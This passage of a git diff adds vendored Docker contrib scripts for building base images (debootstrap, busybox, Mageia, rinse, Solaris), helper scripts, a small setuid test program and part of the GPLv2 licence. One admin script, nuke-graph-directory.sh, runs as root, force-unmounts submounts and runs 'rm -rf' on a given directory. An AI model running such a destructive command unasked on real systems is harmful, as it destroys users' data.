ldd "$busybox" 2>&1 | grep -q 'not a dynamic executable'; then + echo >&2 "error: '$busybox' appears to be a dynamic executable" + echo >&2 ' you should install your distribution "busybox-static" package instead' + exit 1 +fi + +mkdir -p "$rootfsDir/bin" +rm -f "$rootfsDir/bin/busybox" # just in case +cp "$busybox" "$rootfsDir/bin/busybox" + +( + cd "$rootfsDir" + + IFS=$'\n' + modules=( $(bin/busybox --list-modules) ) + unset IFS + + for module in "${modules[@]}"; do + mkdir -p "$(dirname "$module")" + ln -sf /bin/busybox "$module" + done +) diff --git a/vendor/github.com/docker/docker/contrib/mkimage/debootstrap b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap new file mode 100755 index 0000000000..7d56d8ea9f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/debootstrap @@ -0,0 +1,226 @@ +#!/usr/bin/env bash +set -e + +rootfsDir="$1" +shift + +# we have to do a little fancy footwork to make sure "rootfsDir" becomes the second non-option argument to debootstrap + +before=() +while [ $# -gt 0 ] && [[ "$1" == -* ]]; do + before+=( "$1" ) + shift +done + +suite="$1" +shift + +# get path to "chroot" in our current PATH +chrootPath="$(type -P chroot)" +rootfs_chroot() { + # "chroot" doesn't set PATH, so we need to set it explicitly to something our new debootstrap chroot can use appropriately! + + # set PATH and chroot away! + PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' \ + "$chrootPath" "$rootfsDir" "$@" +} + +# allow for DEBOOTSTRAP=qemu-debootstrap ./mkimage.sh ... 
+: ${DEBOOTSTRAP:=debootstrap} + +( + set -x + $DEBOOTSTRAP "${before[@]}" "$suite" "$rootfsDir" "$@" +) + +# now for some Docker-specific tweaks + +# prevent init scripts from running during install/update +echo >&2 "+ echo exit 101 > '$rootfsDir/usr/sbin/policy-rc.d'" +cat > "$rootfsDir/usr/sbin/policy-rc.d" <<-'EOF' + #!/bin/sh + + # For most Docker users, "apt-get install" only happens during "docker build", + # where starting services doesn't work and often fails in humorous ways. This + # prevents those failures by stopping the services from attempting to start. + + exit 101 +EOF +chmod +x "$rootfsDir/usr/sbin/policy-rc.d" + +# prevent upstart scripts from running during install/update +( + set -x + rootfs_chroot dpkg-divert --local --rename --add /sbin/initctl + cp -a "$rootfsDir/usr/sbin/policy-rc.d" "$rootfsDir/sbin/initctl" + sed -i 's/^exit.*/exit 0/' "$rootfsDir/sbin/initctl" +) + +# shrink a little, since apt makes us cache-fat (wheezy: ~157.5MB vs ~120MB) +( set -x; rootfs_chroot apt-get clean ) + +# this file is one APT creates to make sure we don't "autoremove" our currently +# in-use kernel, which doesn't really apply to debootstraps/Docker images that +# don't even have kernels installed +rm -f "$rootfsDir/etc/apt/apt.conf.d/01autoremove-kernels" + +# Ubuntu 10.04 sucks... :) +if strings "$rootfsDir/usr/bin/dpkg" | grep -q unsafe-io; then + # force dpkg not to call sync() after package extraction (speeding up installs) + echo >&2 "+ echo force-unsafe-io > '$rootfsDir/etc/dpkg/dpkg.cfg.d/docker-apt-speedup'" + cat > "$rootfsDir/etc/dpkg/dpkg.cfg.d/docker-apt-speedup" <<-'EOF' + # For most Docker users, package installs happen during "docker build", which + # doesn't survive power loss and gets restarted clean afterwards anyhow, so + # this minor tweak gives us a nice speedup (much nicer on spinning disks, + # obviously). 
+ + force-unsafe-io + EOF +fi + +if [ -d "$rootfsDir/etc/apt/apt.conf.d" ]; then + # _keep_ us lean by effectively running "apt-get clean" after every install + aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";' + echo >&2 "+ cat > '$rootfsDir/etc/apt/apt.conf.d/docker-clean'" + cat > "$rootfsDir/etc/apt/apt.conf.d/docker-clean" <<-EOF + # Since for most Docker users, package installs happen in "docker build" steps, + # they essentially become individual layers due to the way Docker handles + # layering, especially using CoW filesystems. What this means for us is that + # the caches that APT keeps end up just wasting space in those layers, making + # our layers unnecessarily large (especially since we'll normally never use + # these caches again and will instead just "docker build" again and make a brand + # new image). + + # Ideally, these would just be invoking "apt-get clean", but in our testing, + # that ended up being cyclic and we got stuck on APT's lock, so we get this fun + # creation that's essentially just "apt-get clean". + DPkg::Post-Invoke { ${aptGetClean} }; + APT::Update::Post-Invoke { ${aptGetClean} }; + + Dir::Cache::pkgcache ""; + Dir::Cache::srcpkgcache ""; + + # Note that we do realize this isn't the ideal way to do this, and are always + # open to better suggestions (https://github.com/docker/docker/issues). + EOF + + # remove apt-cache translations for fast "apt-get update" + echo >&2 "+ echo Acquire::Languages 'none' > '$rootfsDir/etc/apt/apt.conf.d/docker-no-languages'" + cat > "$rootfsDir/etc/apt/apt.conf.d/docker-no-languages" <<-'EOF' + # In Docker, we don't often need the "Translations" files, so we're just wasting + # time and space by downloading them, and this inhibits that. For users that do + # need them, it's a simple matter to delete this file and "apt-get update". 
:) + + Acquire::Languages "none"; + EOF + + echo >&2 "+ echo Acquire::GzipIndexes 'true' > '$rootfsDir/etc/apt/apt.conf.d/docker-gzip-indexes'" + cat > "$rootfsDir/etc/apt/apt.conf.d/docker-gzip-indexes" <<-'EOF' + # Since Docker users using "RUN apt-get update && apt-get install -y ..." in + # their Dockerfiles don't go delete the lists files afterwards, we want them to + # be as small as possible on-disk, so we explicitly request "gz" versions and + # tell Apt to keep them gzipped on-disk. + + # For comparison, an "apt-get update" layer without this on a pristine + # "debian:wheezy" base image was "29.88 MB", where with this it was only + # "8.273 MB". + + Acquire::GzipIndexes "true"; + Acquire::CompressionTypes::Order:: "gz"; + EOF + + # update "autoremove" configuration to be aggressive about removing suggests deps that weren't manually installed + echo >&2 "+ echo Apt::AutoRemove::SuggestsImportant 'false' > '$rootfsDir/etc/apt/apt.conf.d/docker-autoremove-suggests'" + cat > "$rootfsDir/etc/apt/apt.conf.d/docker-autoremove-suggests" <<-'EOF' + # Since Docker users are looking for the smallest possible final images, the + # following emerges as a very common pattern: + + # RUN apt-get update \ + # && apt-get install -y \ + # && \ + # && apt-get purge -y --auto-remove + + # By default, APT will actually _keep_ packages installed via Recommends or + # Depends if another package Suggests them, even and including if the package + # that originally caused them to be installed is removed. Setting this to + # "false" ensures that APT is appropriately aggressive about removing the + # packages it added. + + # https://aptitude.alioth.debian.org/doc/en/ch02s05s05.html#configApt-AutoRemove-SuggestsImportant + Apt::AutoRemove::SuggestsImportant "false"; + EOF +fi + +if [ -z "$DONT_TOUCH_SOURCES_LIST" ]; then + # tweak sources.list, where appropriate + lsbDist= + if [ -z "$lsbDist" -a -r "$rootfsDir/etc/os-release" ]; then + lsbDist="$(. 
"$rootfsDir/etc/os-release" && echo "$ID")" + fi + if [ -z "$lsbDist" -a -r "$rootfsDir/etc/lsb-release" ]; then + lsbDist="$(. "$rootfsDir/etc/lsb-release" && echo "$DISTRIB_ID")" + fi + if [ -z "$lsbDist" -a -r "$rootfsDir/etc/debian_version" ]; then + lsbDist='Debian' + fi + # normalize to lowercase for easier matching + lsbDist="$(echo "$lsbDist" | tr '[:upper:]' '[:lower:]')" + case "$lsbDist" in + debian) + # updates and security! + if [ "$suite" != 'sid' -a "$suite" != 'unstable' ]; then + ( + set -x + sed -i " + p; + s/ $suite / ${suite}-updates / + " "$rootfsDir/etc/apt/sources.list" + echo "deb http://security.debian.org $suite/updates main" >> "$rootfsDir/etc/apt/sources.list" + ) + fi + ;; + ubuntu) + # add the updates and security repositories + ( + set -x + sed -i " + p; + s/ $suite / ${suite}-updates /; p; + s/ $suite-updates / ${suite}-security / + " "$rootfsDir/etc/apt/sources.list" + ) + ;; + tanglu) + # add the updates repository + if [ "$suite" != 'devel' ]; then + ( + set -x + sed -i " + p; + s/ $suite / ${suite}-updates / + " "$rootfsDir/etc/apt/sources.list" + ) + fi + ;; + steamos) + # add contrib and non-free if "main" is the only component + ( + set -x + sed -i "s/ $suite main$/ $suite main contrib non-free/" "$rootfsDir/etc/apt/sources.list" + ) + ;; + esac +fi + +( + set -x + + # make sure we're fully up-to-date + rootfs_chroot sh -xc 'apt-get update && apt-get dist-upgrade -y' + + # delete all the apt list files since they're big and get stale quickly + rm -rf "$rootfsDir/var/lib/apt/lists"/* + # this forces "apt-get update" in dependent images, which is also good + + mkdir "$rootfsDir/var/lib/apt/lists/partial" # Lucid... "E: Lists directory /var/lib/apt/lists/partial is missing." 
+) diff --git a/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi b/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi new file mode 100755 index 0000000000..93fb289cac --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi @@ -0,0 +1,61 @@ +#!/usr/bin/env bash +# +# Needs to be run from Mageia 4 or greater for kernel support for docker. +# +# Mageia 4 does not have docker available in official repos, so please +# install and run the docker binary manually. +# +# Tested working versions are for Mageia 2 onwards (inc. cauldron). +# +set -e + +rootfsDir="$1" +shift + +optTemp=$(getopt --options '+v:,m:' --longoptions 'version:,mirror:' --name mageia-urpmi -- "$@") +eval set -- "$optTemp" +unset optTemp + +installversion= +mirror= +while true; do + case "$1" in + -v|--version) installversion="$2" ; shift 2 ;; + -m|--mirror) mirror="$2" ; shift 2 ;; + --) shift ; break ;; + esac +done + +if [ -z $installversion ]; then + # Attempt to match host version + if [ -r /etc/mageia-release ]; then + installversion="$(sed 's/^[^0-9\]*\([0-9.]\+\).*$/\1/' /etc/mageia-release)" + else + echo "Error: no version supplied and unable to detect host mageia version" + exit 1 + fi +fi + +if [ -z $mirror ]; then + # No mirror provided, default to mirrorlist + mirror="--mirrorlist https://mirrors.mageia.org/api/mageia.$installversion.x86_64.list" +fi + +( + set -x + urpmi.addmedia --distrib \ + $mirror \ + --urpmi-root "$rootfsDir" + urpmi basesystem-minimal urpmi \ + --auto \ + --no-suggests \ + --urpmi-root "$rootfsDir" \ + --root "$rootfsDir" +) + +"$(dirname "$BASH_SOURCE")/.febootstrap-minimize" "$rootfsDir" + +if [ -d "$rootfsDir/etc/sysconfig" ]; then + # allow networking init scripts inside the container to work without extra steps + echo 'NETWORKING=yes' > "$rootfsDir/etc/sysconfig/network" +fi diff --git a/vendor/github.com/docker/docker/contrib/mkimage/rinse b/vendor/github.com/docker/docker/contrib/mkimage/rinse new file mode 
100755 index 0000000000..75eb4f0d9d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/rinse @@ -0,0 +1,25 @@ +#!/usr/bin/env bash +set -e + +rootfsDir="$1" +shift + +# specifying --arch below is safe because "$@" can override it and the "latest" one wins :) + +( + set -x + rinse --directory "$rootfsDir" --arch amd64 "$@" +) + +"$(dirname "$BASH_SOURCE")/.febootstrap-minimize" "$rootfsDir" + +if [ -d "$rootfsDir/etc/sysconfig" ]; then + # allow networking init scripts inside the container to work without extra steps + echo 'NETWORKING=yes' > "$rootfsDir/etc/sysconfig/network" +fi + +# make sure we're fully up-to-date, too +( + set -x + chroot "$rootfsDir" yum update -y +) diff --git a/vendor/github.com/docker/docker/contrib/mkimage/solaris b/vendor/github.com/docker/docker/contrib/mkimage/solaris new file mode 100755 index 0000000000..158970e69e --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/mkimage/solaris @@ -0,0 +1,89 @@ +#!/usr/bin/env bash +# +# Solaris 12 base image build script. +# +set -e + +# TODO add optional package publisher origin + +rootfsDir="$1" +shift + +# base install +( + set -x + + pkg image-create --full --zone \ + --facet facet.locale.*=false \ + --facet facet.locale.POSIX=true \ + --facet facet.doc=false \ + --facet facet.doc.*=false \ + "$rootfsDir" + + pkg -R "$rootfsDir" set-property use-system-repo true + + pkg -R "$rootfsDir" set-property flush-content-cache-on-success true + + pkg -R "$rootfsDir" install core-os +) + +# Lay in stock configuration, set up milestone +# XXX This all may become optional in a base image +( + # faster to build repository database on tmpfs + REPO_DB=/system/volatile/repository.$$ + export SVCCFG_REPOSITORY=${REPO_DB} + export SVCCFG_DOOR_PATH=$rootfsDir/system/volatile/tmp_repo_door + + # Import base manifests. NOTE These are a combination of basic requirement + # and gleaned from container milestone manifest. They may change. 
+ for m in $rootfsDir/lib/svc/manifest/system/environment.xml \ + $rootfsDir/lib/svc/manifest/system/svc/global.xml \ + $rootfsDir/lib/svc/manifest/system/svc/restarter.xml \ + $rootfsDir/lib/svc/manifest/network/dns/client.xml \ + $rootfsDir/lib/svc/manifest/system/name-service/switch.xml \ + $rootfsDir/lib/svc/manifest/system/name-service/cache.xml \ + $rootfsDir/lib/svc/manifest/milestone/container.xml ; do + svccfg import $m + done + + # Apply system layer profile, deleting unnecessary dependencies + svccfg apply $rootfsDir/etc/svc/profile/generic_container.xml + + # XXX Even if we keep a repo in the base image, this is definitely optional + svccfg apply $rootfsDir/etc/svc/profile/sysconfig/container_sc.xml + + for s in svc:/system/svc/restarter \ + svc:/system/environment \ + svc:/network/dns/client \ + svc:/system/name-service/switch \ + svc:/system/name-service/cache \ + svc:/system/svc/global \ + svc:/milestone/container ;do + svccfg -s $s refresh + done + + # now copy the built up repository into the base rootfs + mv $REPO_DB $rootfsDir/etc/svc/repository.db +) + +# pkg(1) needs the zoneproxy-client running in the container. +# use a simple wrapper to run it as needed. +# XXX maybe we go back to running this in SMF? +mv "$rootfsDir/usr/bin/pkg" "$rootfsDir/usr/bin/wrapped_pkg" +cat > "$rootfsDir/usr/bin/pkg" <<-'EOF' +#!/bin/sh +# +# THIS FILE CREATED DURING DOCKER BASE IMAGE CREATION +# +# The Solaris base image uses the sysrepo proxy mechanism. The +# IPS client pkg(1) requires the zoneproxy-client to reach the +# remote publisher origins through the host. This wrapper script +# enables and disables the proxy client as needed. This is a +# temporary solution. 
+ +/usr/lib/zones/zoneproxy-client -s localhost:1008 +PKG_SYSREPO_URL=http://localhost:1008 /usr/bin/wrapped_pkg "$@" +pkill -9 zoneproxy-client +EOF +chmod +x "$rootfsDir/usr/bin/pkg" diff --git a/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile b/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile new file mode 100644 index 0000000000..026d86954f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile @@ -0,0 +1,9 @@ +FROM buildpack-deps:jessie + +COPY . /usr/src/ + +WORKDIR /usr/src/ + +RUN gcc -g -Wall -static nnp-test.c -o /usr/bin/nnp-test + +RUN chmod +s /usr/bin/nnp-test diff --git a/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c b/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c new file mode 100644 index 0000000000..b767da7e1a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c @@ -0,0 +1,10 @@ +#include +#include +#include + +int main(int argc, char *argv[]) +{ + printf("EUID=%d\n", geteuid()); + return 0; +} + diff --git a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh new file mode 100755 index 0000000000..5eeb45c8bd --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh @@ -0,0 +1,64 @@ +#!/bin/sh +set -e + +dir="$1" + +if [ -z "$dir" ]; then + { + echo 'This script is for destroying old /var/lib/docker directories more safely than' + echo ' "rm -rf", which can cause data loss or other serious issues.' + echo + echo "usage: $0 directory" + echo " ie: $0 /var/lib/docker" + } >&2 + exit 1 +fi + +if [ "$(id -u)" != 0 ]; then + echo >&2 "error: $0 must be run as root" + exit 1 +fi + +if [ ! -d "$dir" ]; then + echo >&2 "error: $dir is not a directory" + exit 1 +fi + +dir="$(readlink -f "$dir")" + +echo +echo "Nuking $dir ..." 
+echo ' (if this is wrong, press Ctrl+C NOW!)' +echo + +( set -x; sleep 10 ) +echo + +dir_in_dir() { + inner="$1" + outer="$2" + [ "${inner#$outer}" != "$inner" ] +} + +# let's start by unmounting any submounts in $dir +# (like -v /home:... for example - DON'T DELETE MY HOME DIRECTORY BRU!) +for mount in $(awk '{ print $5 }' /proc/self/mountinfo); do + mount="$(readlink -f "$mount" || true)" + if [ "$dir" != "$mount" ] && dir_in_dir "$mount" "$dir"; then + ( set -x; umount -f "$mount" ) + fi +done + +# now, let's go destroy individual btrfs subvolumes, if any exist +if command -v btrfs > /dev/null 2>&1; then + # Find btrfs subvolumes under $dir checking for inode 256 + # Source: http://stackoverflow.com/a/32865333 + for subvol in $(find "$dir" -type d -inum 256 | sort -r); do + if [ "$dir" != "$subvol" ]; then + ( set -x; btrfs subvolume delete "$subvol" ) + fi + done +fi + +# finally, DESTROY ALL THINGS +( shopt -s dotglob; set -x; rm -rf "$dir"/* ) diff --git a/vendor/github.com/docker/docker/contrib/project-stats.sh b/vendor/github.com/docker/docker/contrib/project-stats.sh new file mode 100755 index 0000000000..2691c72ffb --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/project-stats.sh @@ -0,0 +1,22 @@ +#!/usr/bin/env bash + +## Run this script from the root of the docker repository +## to query project stats useful to the maintainers. 
+## You will need to install `pulls` and `issues` from +## https://github.com/crosbymichael/pulls + +set -e + +echo -n "Open pulls: " +PULLS=$(pulls | wc -l); let PULLS=$PULLS-1 +echo $PULLS + +echo -n "Pulls alru: " +pulls alru + +echo -n "Open issues: " +ISSUES=$(issues list | wc -l); let ISSUES=$ISSUES-1 +echo $ISSUES + +echo -n "Issues alru: " +issues alru diff --git a/vendor/github.com/docker/docker/contrib/report-issue.sh b/vendor/github.com/docker/docker/contrib/report-issue.sh new file mode 100755 index 0000000000..cb54f1a5bc --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/report-issue.sh @@ -0,0 +1,105 @@ +#!/bin/sh + +# This is a convenience script for reporting issues that include a base +# template of information. See https://github.com/docker/docker/pull/8845 + +set -e + +DOCKER_ISSUE_URL=${DOCKER_ISSUE_URL:-"https://github.com/docker/docker/issues/new"} +DOCKER_ISSUE_NAME_PREFIX=${DOCKER_ISSUE_NAME_PREFIX:-"Report: "} +DOCKER=${DOCKER:-"docker"} +DOCKER_COMMAND="${DOCKER}" +export DOCKER_COMMAND + +# pulled from https://gist.github.com/cdown/1163649 +function urlencode() { + # urlencode + + local length="${#1}" + for (( i = 0; i < length; i++ )); do + local c="${1:i:1}" + case $c in + [a-zA-Z0-9.~_-]) printf "$c" ;; + *) printf '%%%02X' "'$c" + esac + done +} + +function template() { +# this should always match the template from CONTRIBUTING.md + cat <<- EOM + Description of problem: + + + \`docker version\`: + `${DOCKER_COMMAND} -D version` + + + \`docker info\`: + `${DOCKER_COMMAND} -D info` + + + \`uname -a\`: + `uname -a` + + + Environment details (AWS, VirtualBox, physical, etc.): + + + How reproducible: + + + Steps to Reproduce: + 1. + 2. + 3. 
+ + + Actual Results: + + + Expected Results: + + + Additional info: + + + EOM +} + +function format_issue_url() { + if [ ${#@} -ne 2 ] ; then + return 1 + fi + local issue_name=$(urlencode "${DOCKER_ISSUE_NAME_PREFIX}${1}") + local issue_body=$(urlencode "${2}") + echo "${DOCKER_ISSUE_URL}?title=${issue_name}&body=${issue_body}" +} + + +echo -ne "Do you use \`sudo\` to call docker? [y|N]: " +read -r -n 1 use_sudo +echo "" + +if [ "x${use_sudo}" = "xy" -o "x${use_sudo}" = "xY" ]; then + export DOCKER_COMMAND="sudo ${DOCKER}" +fi + +echo -ne "Title of new issue?: " +read -r issue_title +echo "" + +issue_url=$(format_issue_url "${issue_title}" "$(template)") + +if which xdg-open 2>/dev/null >/dev/null ; then + echo -ne "Would like to launch this report in your browser? [Y|n]: " + read -r -n 1 launch_now + echo "" + + if [ "${launch_now}" != "n" -a "${launch_now}" != "N" ]; then + xdg-open "${issue_url}" + fi +fi + +echo "If you would like to manually open the url, you can open this link if your browser: ${issue_url}" + diff --git a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh new file mode 100755 index 0000000000..9ecf99d465 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh @@ -0,0 +1,12 @@ +#!/bin/bash +set -e + +cd "$(dirname "$BASH_SOURCE")/../.." 
+ +targets_from() { + git fetch -q https://github.com/docker/docker.git "$1" + git ls-tree -r --name-only "$(git rev-parse FETCH_HEAD)" contrib/builder/deb/ | grep '/Dockerfile$' | sed -r 's!^contrib/builder/deb/|^contrib/builder/deb/amd64/|-debootstrap|/Dockerfile$!!g' | grep -v / +} + +release_branch=$(git ls-remote --heads https://github.com/docker/docker.git | awk -F 'refs/heads/' '$2 ~ /^release/ { print $2 }' | sort -V | tail -1) +{ targets_from master; targets_from "$release_branch"; } | sort -u diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE new file mode 100644 index 0000000000..d511905c16 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. 
Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. 
+ + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. 
You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. 
+ +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. 
However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. 
+You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. 
If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
